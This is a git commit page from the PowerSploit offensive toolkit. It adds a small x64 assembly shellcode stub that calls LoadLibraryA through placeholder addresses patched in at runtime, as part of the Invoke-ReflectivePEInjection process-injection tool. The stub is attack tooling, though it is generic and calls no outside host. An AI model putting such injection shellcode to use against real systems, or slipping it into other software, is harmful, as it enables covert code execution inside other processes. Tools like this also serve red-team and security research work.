diff options
| author | Matt Graeber <mattgraeber@gmail.com> | 2013-05-31 19:35:26 -0400 |
|---|---|---|
| committer | Matt Graeber <mattgraeber@gmail.com> | 2013-05-31 19:35:26 -0400 |
| commit | dfec277813bfbc956dcac45345a9158093d68343 (patch) | |
| tree | f205c4c4d6e81f33ace8086bbf63881ffc12dd51 /CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm | |
| parent | 6e5338c8a34ade0ec0a4704031109fb5187620f8 (diff) | |
| download | PowerSploit-dfec277813bfbc956dcac45345a9158093d68343.tar.gz PowerSploit-dfec277813bfbc956dcac45345a9158093d68343.zip | |
Added Invoke-ReflectivePEInjection
Another awesome addition from Joe Bialek. Invoke-ReflectivePEInjection
is a vast improvement over Invoke-ReflectiveDllInjection. It adds the
following features:
* Now supports loading exe files in memory
* Supports reflective dll injection into a remote process
* Additional sample Visual Studio solutions
Diffstat (limited to 'CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm')
| -rw-r--r-- | CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm | 23 |
1 files changed, 23 insertions, 0 deletions
diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm new file mode 100644 index 0000000..7f16471 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm @@ -0,0 +1,23 @@ +[SECTION .text] + +global _start + +_start: + ; Save rsp and setup stack for function call + push rbx + mov rbx, rsp + sub rsp, 0x20 + and sp, 0xffc0 + + ; Call LoadLibraryA + mov rcx, 0x4141414141414141 ; Ptr to string of library, set by PS + mov rdx, 0x4141414141414141 ; Address of LoadLibrary, set by PS + call rdx + + mov rdx, 0x4141414141414141 ; Ptr to save result, set by PS + mov [rdx], rax + + ; Fix stack + mov rsp, rbx + pop rbx + ret |